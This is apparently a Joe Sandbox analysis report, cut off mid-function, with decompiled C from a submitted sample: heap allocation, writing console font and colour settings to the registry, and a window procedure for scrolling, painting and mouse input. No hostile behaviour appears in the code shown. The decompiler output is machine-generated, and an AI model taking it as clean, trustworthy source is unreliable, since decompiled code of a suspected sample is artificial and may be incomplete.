Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fb9ed8ccf4c6caacf9f31d2cdff59ee98080ad1aa6ad6dc753b87f869a753392
Instruction ID: 80027e9cdaf24549dac4fd288b678cd230d30b157aca2310519cfee81b112edb
Opcode Fuzzy Hash: fb9ed8ccf4c6caacf9f31d2cdff59ee98080ad1aa6ad6dc753b87f869a753392
Instruction Fuzzy Hash: 6FF0E9322445B47FEB216BA1AC05BEA3B9DAF51760B15C521EC05D6092CF61DC0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 001B48CE Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001B48CE(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E001B47E4())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x1c62dc, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E001B0EFD();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E001B39FF(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x001b48d4
0x001b48da
0x001b490c
0x001b4911
0x001b4917
0x00000000
0x001b4917
0x001b48de
0x001b48e0
0x001b48e0
0x001b48f7
0x001b4900
0x001b4908
0x00000000
0x00000000
0x001b48e8
0x001b48ea
0x00000000
0x00000000
0x001b48ed
0x001b48f3
0x001b48f5
0x00000000
0x00000000
0x001b48f5
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,001B5E38,?,?,?,001A56F0), ref: 001B4900

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f560c7b53474cbac61fc7d8de1fd881d7d35650458ebedbe4cbe1822261e15dd
Instruction ID: 8df4b4e3318417ae9d346b5ed5263b060a41496b09c94dbe8f6e495bd660c781
Opcode Fuzzy Hash: f560c7b53474cbac61fc7d8de1fd881d7d35650458ebedbe4cbe1822261e15dd
Instruction Fuzzy Hash: 13E0ED352402A46BEB2136E59C00BEB3A4C9B1A3A4F158122EC15921D3CF20CC10C1A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001AC4C0 Relevance: 74.0, APIs: 24, Strings: 18, Instructions: 467
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfW.USER32 ref: 001AC573
RegSetValueExW.ADVAPI32 ref: 001AC5BF
RegSetValueExW.ADVAPI32 ref: 001AC63D
RegSetValueExW.ADVAPI32 ref: 001AC6A2

Part of subcall function 001A3370: GetDpiForSystem.USER32 ref: 001A33DC
Part of subcall function 001A3370: MulDiv.KERNEL32 ref: 001A33F5
Part of subcall function 001A3370: GetDpiForSystem.USER32 ref: 001A3406
Part of subcall function 001A3370: MulDiv.KERNEL32 ref: 001A341F

RegSetValueExW.ADVAPI32 ref: 001AC70A
lstrcmpW.KERNEL32 ref: 001AC738
lstrlenW.KERNEL32 ref: 001AC755
RegSetValueExW.ADVAPI32 ref: 001AC797
RegSetValueExW.ADVAPI32 ref: 001AC7FF
GetDpiForSystem.USER32 ref: 001AC836
MulDiv.KERNEL32 ref: 001AC851
GetDpiForSystem.USER32 ref: 001AC860
MulDiv.KERNEL32 ref: 001AC87B
RegSetValueExW.ADVAPI32 ref: 001AC8E6
RegSetValueExW.ADVAPI32 ref: 001AC94E
RegSetValueExW.ADVAPI32 ref: 001AC9B0
RegSetValueExW.ADVAPI32 ref: 001ACA12
RegSetValueExW.ADVAPI32 ref: 001ACA74
RegSetValueExW.ADVAPI32 ref: 001ACAD6
RegSetValueExW.ADVAPI32 ref: 001ACB38
RegSetValueExW.ADVAPI32 ref: 001ACB9A
RegSetValueExW.ADVAPI32 ref: 001ACC27
RegSetValueExW.ADVAPI32 ref: 001ACC8C
RegSetValueExW.ADVAPI32 ref: 001ACD19

Strings

HistoryNoDup, xrefs: 001AC9E7
InsertMode, xrefs: 001ACA49
ScreenBufferSize, xrefs: 001ACBFC
FaceName, xrefs: 001AC770
FontPitchFamily, xrefs: 001AC7D4
WindowSize, xrefs: 001ACCEE
EditionMode, xrefs: 001AC6DF
FontWeight, xrefs: 001AC923
ColorTable%02d, xrefs: 001AC562
FontSize, xrefs: 001AC8BB
QuickEdit, xrefs: 001ACB6F
`, xrefs: 001AC86F
PopupColors, xrefs: 001ACB0D
HistoryBufferSize, xrefs: 001AC985
MenuMask, xrefs: 001ACAAB
CursorSize, xrefs: 001AC612
CursorVisible, xrefs: 001AC677
ScreenColors, xrefs: 001ACC61

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: Value$System$lstrcmplstrlenwsprintf
String ID: ColorTable%02d$CursorSize$CursorVisible$EditionMode$FaceName$FontPitchFamily$FontSize$FontWeight$HistoryBufferSize$HistoryNoDup$InsertMode$MenuMask$PopupColors$QuickEdit$ScreenBufferSize$ScreenColors$WindowSize$`
API String ID: 4202061470-2238697219
Opcode ID: 858543aeedf44c15cb85f22552e99783cc4310e3ef2b7b7576a591d04893ea7c
Instruction ID: a3943021e2eb4a90a00026d45a18f731758f7e6a14e630a034b08b7a3ed1a1a0
Opcode Fuzzy Hash: 858543aeedf44c15cb85f22552e99783cc4310e3ef2b7b7576a591d04893ea7c
Instruction Fuzzy Hash: 0232B0B4904259DFDB14DF58C484BAEBBF0FB48314F00896EE9599B250D774EA88CF92

Uniqueness

Uniqueness Score: -1.00%

Function 001A8E70 Relevance: 50.2, APIs: 33, Instructions: 689
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsWindowVisible.USER32 ref: 001A8EE6
GetDC.USER32 ref: 001A8F61
CreateCompatibleBitmap.GDI32 ref: 001A8FBB
ReleaseDC.USER32 ref: 001A8FDA
SelectObject.GDI32 ref: 001A8FF8
DeleteObject.GDI32 ref: 001A9023
SetRect.USER32 ref: 001A9073
GetWindowLongW.USER32 ref: 001A9189
AdjustWindowRect.USER32 ref: 001A91A6
GetSystemMetrics.USER32 ref: 001A91D6
SetScrollRange.USER32 ref: 001A9218
SetScrollPos.USER32 ref: 001A924C
ShowScrollBar.USER32 ref: 001A9273
ShowScrollBar.USER32 ref: 001A929F
GetSystemMetrics.USER32 ref: 001A92C1
SetScrollRange.USER32 ref: 001A9303
SetScrollPos.USER32 ref: 001A9337
ShowScrollBar.USER32 ref: 001A935C
ShowScrollBar.USER32 ref: 001A9388
SetWindowPos.USER32 ref: 001A93E5
SystemParametersInfoW.USER32 ref: 001A940E
GetSystemMetrics.USER32 ref: 001A9448
InvalidateRect.USER32 ref: 001A9491
UpdateWindow.USER32 ref: 001A94A6
InvalidateRect.USER32 ref: 001A9761
UpdateWindow.USER32 ref: 001A9776
GetFocus.USER32 ref: 001A9803
CreateCaret.USER32 ref: 001A9867
DestroyCaret.USER32 ref: 001A9883

Part of subcall function 001A6C30: SetRect.USER32 ref: 001A6C69

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: Scroll$Window$Rect$ShowSystem$Metrics$CaretCreateInvalidateObjectRangeUpdate$AdjustBitmapCompatibleDeleteDestroyFocusInfoLongParametersReleaseSelectVisible
String ID:
API String ID: 3288602422-0
Opcode ID: f7132b60c0908bf3fb50e3fc316b5d6ccaae743163a8798d62b66ddf01e67e0b
Instruction ID: 7d6b5b92c4fdc9c65c71b1933dd4866fdb93306742dffa4b90dc04796289a69a
Opcode Fuzzy Hash: f7132b60c0908bf3fb50e3fc316b5d6ccaae743163a8798d62b66ddf01e67e0b
Instruction Fuzzy Hash: 90728078604205DFC704DF68C198AA9BBF1FF48354F1585ADE889CB362DB35E985CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001A34E0 Relevance: 36.1, APIs: 19, Strings: 1, Instructions: 1077
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 20%

			E001A34E0(struct HWND__* _a4, int _a8, signed int _a12, unsigned int _a16) {
				long _v20;
				long _v24;
				struct tagPAINTSTRUCT _v88;
				struct HDC__* _v92;
				int _v96;
				long _v100;
				int _v104;
				long _v108;
				int _v112;
				struct tagPOINT _v120;
				int _v124;
				int _v128;
				int _v132;
				intOrPtr _v136;
				signed int _v140;
				int _v144;
				intOrPtr _v148;
				signed int _v152;
				void _v156;
				intOrPtr _v160;
				int _v164;
				struct HDC__** _v168;
				long _v172;
				long _v176;
				long _v180;
				long _v184;
				long _v188;
				long _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				void* _v260;
				void* _v264;
				void* _v268;
				void* _v272;
				int _v276;
				struct HWND__* _v280;
				signed int _v284;
				unsigned int _v288;
				long _v292;
				int _v296;
				struct HDC__* _v324;
				void* __edi;
				void* __ebp;
				intOrPtr* _t625;
				long _t627;
				int _t628;
				long _t639;
				struct HDC__** _t641;
				signed int _t645;
				long _t667;
				intOrPtr _t669;
				long _t678;
				intOrPtr _t680;
				long _t684;
				long _t725;
				struct HDC__** _t727;
				long _t739;
				struct HDC__** _t743;
				long _t753;
				intOrPtr _t755;
				long _t763;
				signed int _t764;
				long _t776;
				struct HDC__** _t778;
				long _t791;
				signed short _t792;
				signed int _t799;
				long _t824;
				signed short _t825;
				signed int _t832;
				long _t860;
				struct HMENU__* _t868;
				long _t872;
				struct HDC__** _t879;
				struct HWND__* _t880;
				struct HDC__** _t882;
				struct HDC__** _t892;
				long _t895;
				struct HDC__** _t902;
				struct HDC__** _t904;
				struct HDC__** _t906;
				struct HDC__* _t910;
				struct HDC__** _t922;
				struct HDC__** _t928;
				long _t931;
				struct HDC__** _t938;
				struct HWND__* _t939;
				struct HDC__** _t941;
				struct HDC__** _t950;
				long _t960;
				intOrPtr _t1000;
				signed int _t1016;
				intOrPtr _t1048;
				intOrPtr _t1052;
				signed int _t1056;
				intOrPtr _t1061;
				intOrPtr _t1065;
				signed int _t1069;
				long _t1080;
				signed int _t1083;
				long _t1101;
				signed int _t1104;
				struct HDC__** _t1115;
				intOrPtr _t1124;
				signed int _t1133;
				signed char _t1144;
				intOrPtr _t1166;
				void* _t1169;
				intOrPtr* _t1195;
				struct HDC__** _t1196;
				struct HWND__** _t1203;
				struct HWND__** _t1226;

				_t625 = _t1195;
				 *_t625 = _a4;
				 *(_t625 + 4) = 0;
				_t627 = GetWindowLongW(??, ??);
				_t1196 = _t1195 - 8;
				_v24 = _t627;
				_t628 = _a8;
				_v160 = _t628;
				if(_t628 == 1) {
					_v20 = L001A8D50(_a4, _a16);
				} else {
					if(_v160 == 2) {
						 *(_v24 + 0xa8) = 0;
						PostQuitMessage(0);
						goto L193;
					} else {
						if(_v160 == 5) {
							_t639 = _v24;
							__eflags =  *(_t639 + 0x84);
							if( *(_t639 + 0x84) != 0) {
								_t641 =  *(_v24 + 0x84);
								__eflags = _t641[0x19] - 2;
								if(_t641[0x19] != 2) {
									_t645 = _a16 >> 0x00000010 & 0xffff;
									_t1016 =  *( *((intOrPtr*)(_v24 + 8)) + 0x82);
									asm("cdq");
									__eflags = _t645 / _t1016 - 0x14;
									if(_t645 / _t1016 <= 0x14) {
										_v196 = 0x14;
									} else {
										asm("cdq");
										_v196 = (_a16 >> 0x00000010 & 0xffff) /  *( *((intOrPtr*)(_v24 + 8)) + 0x82);
									}
									_v200 = _v196;
									asm("cdq");
									__eflags = (_a16 & 0xffff) /  *( *((intOrPtr*)(_v24 + 8)) + 0x80) - 0x14;
									if(__eflags <= 0) {
										_v204 = 0x14;
									} else {
										asm("cdq");
										_v204 = (_a16 & 0xffff) /  *( *((intOrPtr*)(_v24 + 8)) + 0x80);
									}
									_v292 = _v24;
									_v288 = _v204;
									_v284 = _v200;
									E001AA5D0(__eflags);
								}
							}
							goto L193;
						} else {
							if(_v160 == 7) {
								_t667 = _v24;
								__eflags =  *(_t667 + 0x84);
								if( *(_t667 + 0x84) != 0) {
									_t669 =  *((intOrPtr*)(_v24 + 8));
									__eflags =  *(_t669 + 0x18);
									if( *(_t669 + 0x18) != 0) {
										CreateCaret( *(_v24 + 0xa8), ( *(_v24 + 0x84))[4],  *( *((intOrPtr*)(_v24 + 8)) + 0x80),  *( *((intOrPtr*)(_v24 + 8)) + 0x82));
										_v292 = _v24;
										E001AA510();
									}
								}
								goto L193;
							} else {
								if(_v160 == 8) {
									_t678 = _v24;
									__eflags =  *(_t678 + 0x84);
									if( *(_t678 + 0x84) != 0) {
										_t680 =  *((intOrPtr*)(_v24 + 8));
										__eflags =  *(_t680 + 0x18);
										if( *(_t680 + 0x18) != 0) {
											DestroyCaret();
										}
									}
									goto L193;
								} else {
									if(_v160 == 0xf) {
										_t684 = _v24;
										__eflags =  *(_t684 + 0x84);
										if( *(_t684 + 0x84) != 0) {
											BeginPaint( *(_v24 + 0xa8),  &_v88);
											_v164 =  *( *((intOrPtr*)(_v24 + 8)) + 0x74) *  *( *((intOrPtr*)(_v24 + 8)) + 0x82);
											BitBlt(_v88.hdc, 0, 0, ( *( *((intOrPtr*)(_v24 + 8)) + 0x78) -  *( *((intOrPtr*)(_v24 + 8)) + 0x70) + 1) *  *( *((intOrPtr*)(_v24 + 8)) + 0x80), ( *( *((intOrPtr*)(_v24 + 8)) + 0x7c) -  *( *((intOrPtr*)(_v24 + 8)) + 0x74) + 1) *  *( *((intOrPtr*)(_v24 + 8)) + 0x82),  *( *(_v24 + 0x84)),  *( *((intOrPtr*)(_v24 + 8)) + 0x70) *  *( *((intOrPtr*)(_v24 + 8)) + 0x80), _v164, 0xcc0020);
											_t1203 = _t1196 - 0xffffffffffffffe4;
											__eflags = ( *(_v24 + 0x84))[5];
											if(__eflags != 0) {
												 *_t1203 = _v24;
												_v324 = _v88;
												E001A9950(__eflags);
												_t1203 = _t1203 - 8;
											}
											 *_t1203 =  *(_v24 + 0xa8);
											_v324 =  &_v88;
											EndPaint(??, ??);
										} else {
										}
										goto L193;
									} else {
										if(_v160 == 0x18) {
											_t725 = _v24;
											__eflags =  *(_t725 + 0x84);
											if( *(_t725 + 0x84) != 0) {
												__eflags = _a12;
												if(_a12 == 0) {
													_t727 =  *(_v24 + 0x84);
													__eflags = _t727[1];
													if(_t727[1] != 0) {
														DeleteObject(( *(_v24 + 0x84))[1]);
													}
													( *(_v24 + 0x84))[1] = 0;
												} else {
													_v292 = _v24;
													E001A8E70();
												}
											} else {
											}
											goto L193;
										} else {
											if(_v160 + 0xffffff00 - 2 < 0) {
												_t739 = _v24;
												__eflags =  *(_t739 + 0x84);
												if( *(_t739 + 0x84) == 0) {
													L74:
													__eflags = _a8 - 0x100;
													_t1144 = (_t1133 & 0xffffff00 | _a8 == 0x00000100) & 0x00000001;
													__eflags = _t1144;
													_v292 = _v24;
													_v288 = _t1144 & 0x000000ff;
													_v284 = _a12;
													_v280 = _a16;
													E001A9F10(_t1169, _t1144);
												} else {
													_t743 =  *(_v24 + 0x84);
													__eflags = _t743[5];
													if(_t743[5] == 0) {
														goto L74;
													} else {
														__eflags = _a8 - 0x100;
														_v292 = _v24;
														_v288 = (_t1133 & 0xffffff00 | _a8 == 0x00000100) & 1;
														_v284 = _a12;
														_v280 = _a16;
														E001A9A80();
													}
												}
												goto L193;
											} else {
												if(_v160 + 0xfffffefc - 2 < 0) {
													__eflags = _a8 - 0x104;
													_v292 = _v24;
													_v288 = (_t1133 & 0xffffff00 | __eflags == 0x00000000) & 1;
													_v284 = _a12;
													_v280 = _a16;
													E001A9F10(_t1169, __eflags);
													goto L193;
												} else {
													if(_v160 == 0x111) {
														_t753 = _v24;
														__eflags =  *(_t753 + 0x84);
														if( *(_t753 + 0x84) != 0) {
															_t755 = _a12 + 0xfffffeff;
															_v248 = _t755;
															__eflags = _t755 - 0x14;
															if(_t755 - 0x14 <= 0) {
																goto __eax;
															}
															_v20 = DefWindowProcW(_a4, _a8, _a12, _a16);
														} else {
															goto L193;
														}
													} else {
														if(_v160 == 0x112) {
															_t763 = _v24;
															__eflags =  *(_t763 + 0x84);
															if( *(_t763 + 0x84) != 0) {
																_t764 = _a12;
																_v244 = _t764;
																__eflags = _t764 == 0x101;
																if(_t764 == 0x101) {
																	_v292 = _v24;
																	_v288 = 0;
																	E001AA680(_t1169);
																	goto L182;
																} else {
																	__eflags = _v244 == 0x102;
																	if(_v244 == 0x102) {
																		_v292 = _v24;
																		_v288 = 1;
																		E001AA680(_t1169);
																		L182:
																		goto L193;
																	} else {
																		_v20 = DefWindowProcW(_a4, _a8, _a12, _a16);
																	}
																}
															} else {
																goto L193;
															}
														} else {
															if(_v160 == 0x113) {
																L54:
																_t776 = _v24;
																__eflags =  *(_t776 + 0x84);
																if( *(_t776 + 0x84) != 0) {
																	_t778 =  *(_v24 + 0x84);
																	__eflags = _t778[0x19] - 1;
																	if(_t778[0x19] == 1) {
																		_v292 = _v24;
																		E001A8E70();
																	}
																}
																goto L193;
															} else {
																if(_v160 == 0x114) {
																	_v136 =  *( *((intOrPtr*)(_v24 + 8)) + 0x78) -  *( *((intOrPtr*)(_v24 + 8)) + 0x70) + 1;
																	_v140 =  *( *((intOrPtr*)(_v24 + 8)) + 0x70);
																	_t791 = _v24;
																	__eflags =  *(_t791 + 0x84);
																	if( *(_t791 + 0x84) != 0) {
																		_t792 = _a12;
																		_v208 = _t792 & 0x0000ffff;
																		__eflags = _t792 - 5;
																		if(_t792 - 5 <= 0) {
																			goto __eax;
																		}
																		__eflags = _v140;
																		if(_v140 <= 0) {
																			_v212 = 0;
																		} else {
																			_v212 = _v140;
																		}
																		_t1048 =  *((intOrPtr*)(_v24 + 8));
																		__eflags = _v212 -  *((intOrPtr*)(_t1048 + 0xc)) - _v136;
																		if(_v212 >=  *((intOrPtr*)(_t1048 + 0xc)) - _v136) {
																			_t799 =  *((intOrPtr*)( *((intOrPtr*)(_v24 + 8)) + 0xc)) - _v136;
																			__eflags = _t799;
																			_v220 = _t799;
																		} else {
																			__eflags = _v140;
																			if(_v140 <= 0) {
																				_v216 = 0;
																			} else {
																				_v216 = _v140;
																			}
																			_v220 = _v216;
																		}
																		_v140 = _v220;
																		_t1052 =  *((intOrPtr*)(_v24 + 8));
																		__eflags = _v140 -  *((intOrPtr*)(_t1052 + 0x70));
																		if(_v140 !=  *((intOrPtr*)(_t1052 + 0x70))) {
																			 *( *((intOrPtr*)(_v24 + 8)) + 0x70) = _v140;
																			_t1056 = _v140 + _v136 - 1;
																			__eflags = _t1056;
																			 *( *((intOrPtr*)(_v24 + 8)) + 0x78) = _t1056;
																			_v292 = _v24;
																			E001A8E70();
																		}
																	} else {
																	}
																	goto L193;
																} else {
																	if(_v160 == 0x115) {
																		L153:
																		_v148 =  *( *((intOrPtr*)(_v24 + 8)) + 0x7c) -  *( *((intOrPtr*)(_v24 + 8)) + 0x74) + 1;
																		_v152 =  *( *((intOrPtr*)(_v24 + 8)) + 0x74);
																		_t824 = _v24;
																		__eflags =  *(_t824 + 0x84);
																		if( *(_t824 + 0x84) != 0) {
																			__eflags = _a8 - 0x20a;
																			if(_a8 != 0x20a) {
																				_t825 = _a12;
																				_v228 = _t825 & 0x0000ffff;
																				__eflags = _t825 - 5;
																				if(_t825 - 5 <= 0) {
																					goto __eax;
																				}
																			} else {
																				_v156 = 3;
																				SystemParametersInfoW(0x68, 0,  &_v156, 0);
																				_t1196 = _t1196 - 0x10;
																				asm("cdq");
																				_v156 = (0 - (_a12 >> 0x00000010 & 0x0000ffff)) / 0x78 * _v156;
																				_v152 = _v156 + _v152;
																			}
																			__eflags = _v152;
																			if(_v152 <= 0) {
																				_v232 = 0;
																			} else {
																				_v232 = _v152;
																			}
																			_t1061 =  *((intOrPtr*)(_v24 + 8));
																			__eflags = _v232 -  *((intOrPtr*)(_t1061 + 0x10)) - _v148;
																			if(_v232 >=  *((intOrPtr*)(_t1061 + 0x10)) - _v148) {
																				_t832 =  *((intOrPtr*)( *((intOrPtr*)(_v24 + 8)) + 0x10)) - _v148;
																				__eflags = _t832;
																				_v240 = _t832;
																			} else {
																				__eflags = _v152;
																				if(_v152 <= 0) {
																					_v236 = 0;
																				} else {
																					_v236 = _v152;
																				}
																				_v240 = _v236;
																			}
																			_v152 = _v240;
																			_t1065 =  *((intOrPtr*)(_v24 + 8));
																			__eflags = _v152 -  *((intOrPtr*)(_t1065 + 0x74));
																			if(_v152 !=  *((intOrPtr*)(_t1065 + 0x74))) {
																				 *( *((intOrPtr*)(_v24 + 8)) + 0x74) = _v152;
																				_t1069 = _v152 + _v148 - 1;
																				__eflags = _t1069;
																				 *( *((intOrPtr*)(_v24 + 8)) + 0x7c) = _t1069;
																				_v292 = _v24;
																				E001A8E70();
																			}
																		} else {
																		}
																		goto L193;
																	} else {
																		if(_v160 == 0x117) {
																			_t860 = _v24;
																			__eflags =  *(_t860 + 0x84);
																			if( *(_t860 + 0x84) == 0) {
																				L190:
																				_v20 = DefWindowProcW(_a4, _a8, _a12, _a16);
																			} else {
																				__eflags = _a16 >> 0x00000010 & 0x0000ffff;
																				if((_a16 >> 0x00000010 & 0x0000ffff) != 0) {
																					_t868 = GetSystemMenu( *(_v24 + 0xa8), 0);
																					_v292 = _v24;
																					_v288 = _t868;
																					E001AA450();
																					goto L193;
																				} else {
																					goto L190;
																				}
																			}
																		} else {
																			if(_v160 == 0x200) {
																				_t872 = _v24;
																				__eflags =  *(_t872 + 0x84);
																				if( *(_t872 + 0x84) == 0) {
																					L97:
																					_v176 = _a12;
																					_v292 = _v24;
																					_v288 = _a16;
																					_v104 = E001AA070();
																					 *(_t1196 - 8) = _v24;
																					_v296 = _v104;
																					_v292 = _v176;
																					_v288 = 1;
																					E001AA0F0(_t1169);
																				} else {
																					_t879 =  *(_v24 + 0x84);
																					__eflags = _t879[0xb];
																					if(_t879[0xb] != 0) {
																						L92:
																						_t880 = GetCapture();
																						_t1080 = _v24;
																						__eflags = _t880 -  *((intOrPtr*)(_t1080 + 0xa8));
																						if(_t880 ==  *((intOrPtr*)(_t1080 + 0xa8))) {
																							_t882 =  *(_v24 + 0x84);
																							__eflags = _t882[5];
																							if(_t882[5] != 0) {
																								__eflags = _a12 & 0x00000001;
																								if((_a12 & 0x00000001) != 0) {
																									_v292 = _v24;
																									_v288 = _a16;
																									_v100 = E001AA070();
																									_t1083 =  &(( *(_v24 + 0x84))[6]);
																									__eflags = _t1083;
																									 *(_t1196 - 8) = _v24;
																									_v296 =  *_t1083;
																									_v292 = _v100;
																									E001AA250();
																								}
																							}
																						}
																					} else {
																						_t892 =  *(_v24 + 0x84);
																						__eflags = _t892[5];
																						if(_t892[5] == 0) {
																							goto L97;
																						} else {
																							goto L92;
																						}
																					}
																				}
																				goto L193;
																			} else {
																				if(_v160 == 0x201) {
																					_t895 = _v24;
																					__eflags =  *(_t895 + 0x84);
																					if( *(_t895 + 0x84) == 0) {
																						L87:
																						_v172 = _a12;
																						_v292 = _v24;
																						_v288 = _a16;
																						_v96 = E001AA070();
																						__eflags = 0;
																						 *(_t1196 - 8) = _v24;
																						_v296 = _v96;
																						_v292 = _v172;
																						_v288 = 0;
																						E001AA0F0(_t1169);
																					} else {
																						_t902 =  *(_v24 + 0x84);
																						__eflags = _t902[0xb];
																						if(_t902[0xb] != 0) {
																							L80:
																							_t904 =  *(_v24 + 0x84);
																							__eflags = _t904[5];
																							if(_t904[5] != 0) {
																								__eflags = 0;
																								_v292 = _v24;
																								_v288 = 0;
																								E001A9950(0);
																								_t1196 = _t1196 - 8;
																							}
																							_t906 =  *(_v24 + 0x84);
																							__eflags = _t906[0xb];
																							if(_t906[0xb] == 0) {
																								L85:
																								_v168 =  *(_v24 + 0x84);
																								_v292 = _v24;
																								_v288 = _a16;
																								_t910 = E001AA070();
																								_t1226 = _t1196 - 8;
																								_v92 = _t910;
																								_v168[7] = _v92;
																								( *(_v24 + 0x84))[6] = ( *(_v24 + 0x84))[7];
																								 *_t1226 =  *(_v24 + 0xa8);
																								SetCapture(??);
																								__eflags = 0;
																								 *((intOrPtr*)(_t1226 - 4)) = _v24;
																								_v296 = 0;
																								E001A9950(0);
																								( *(_v24 + 0x84))[5] = 1;
																							} else {
																								_t922 =  *(_v24 + 0x84);
																								__eflags = _t922[5];
																								if(_t922[5] == 0) {
																									goto L85;
																								} else {
																									( *(_v24 + 0x84))[5] = 0;
																								}
																							}
																						} else {
																							_t928 =  *(_v24 + 0x84);
																							__eflags = _t928[5];
																							if(_t928[5] == 0) {
																								goto L87;
																							} else {
																								goto L80;
																							}
																						}
																					}
																					goto L193;
																				} else {
																					if(_v160 == 0x202) {
																						_t931 = _v24;
																						__eflags =  *(_t931 + 0x84);
																						if( *(_t931 + 0x84) == 0) {
																							L106:
																							_v180 = _a12;
																							_v292 = _v24;
																							_v288 = _a16;
																							_v112 = E001AA070();
																							__eflags = 0;
																							 *(_t1196 - 8) = _v24;
																							_v296 = _v112;
																							_v292 = _v180;
																							_v288 = 0;
																							E001AA0F0(_t1169);
																						} else {
																							_t938 =  *(_v24 + 0x84);
																							__eflags = _t938[0xb];
																							if(_t938[0xb] != 0) {
																								L102:
																								_t939 = GetCapture();
																								_t1101 = _v24;
																								__eflags = _t939 -  *((intOrPtr*)(_t1101 + 0xa8));
																								if(_t939 ==  *((intOrPtr*)(_t1101 + 0xa8))) {
																									_t941 =  *(_v24 + 0x84);
																									__eflags = _t941[5];
																									if(_t941[5] != 0) {
																										_v292 = _v24;
																										_v288 = _a16;
																										_v108 = E001AA070();
																										_t1104 =  &(( *(_v24 + 0x84))[6]);
																										__eflags = _t1104;
																										 *(_t1196 - 8) = _v24;
																										_v296 =  *_t1104;
																										_v292 = _v108;
																										E001AA250();
																										ReleaseCapture();
																									}
																								}
																							} else {
																								_t950 =  *(_v24 + 0x84);
																								__eflags = _t950[5];
																								if(_t950[5] == 0) {
																									goto L106;
																								} else {
																									goto L102;
																								}
																							}
																						}
																						goto L193;
																					} else {
																						if(_v160 == 0x203) {
																							L114:
																							_v192 = _a12;
																							_v292 = _v24;
																							_v288 = _a16;
																							_v132 = E001AA070();
																							 *(_t1196 - 8) = _v24;
																							_v296 = _v132;
																							_v292 = _v192;
																							_v288 = 2;
																							E001AA0F0(_t1169);
																							goto L193;
																						} else {
																							if(_v160 == 0x204) {
																								_t960 = _v24;
																								__eflags =  *(_t960 + 0x84);
																								if( *(_t960 + 0x84) == 0) {
																									L111:
																									_v184 = _a12;
																									_v292 = _v24;
																									_v288 = _a16;
																									_v124 = E001AA070();
																									__eflags = 0;
																									 *(_t1196 - 8) = _v24;
																									_v296 = _v124;
																									_v292 = _v184;
																									_v288 = 0;
																									E001AA0F0(_t1169);
																								} else {
																									_t1115 =  *(_v24 + 0x84);
																									__eflags = (_a12 & 0x0000000c) - _t1115[0xc];
																									if((_a12 & 0x0000000c) != _t1115[0xc]) {
																										goto L111;
																									} else {
																										_v120.x = _a16 & 0x0000ffff;
																										_v120.y = _a16 >> 0x00000010 & 0x0000ffff;
																										ClientToScreen(_a4,  &_v120);
																										_v292 = _v24;
																										_v288 = ( *(_v24 + 0x84))[3];
																										E001AA450();
																										 *_t1196 = ( *(_v24 + 0x84))[3];
																										_v296 = 2;
																										_v292 = _v120.x;
																										_v288 = _v120.y;
																										_v284 = 0;
																										_v280 = _a4;
																										_v276 = 0;
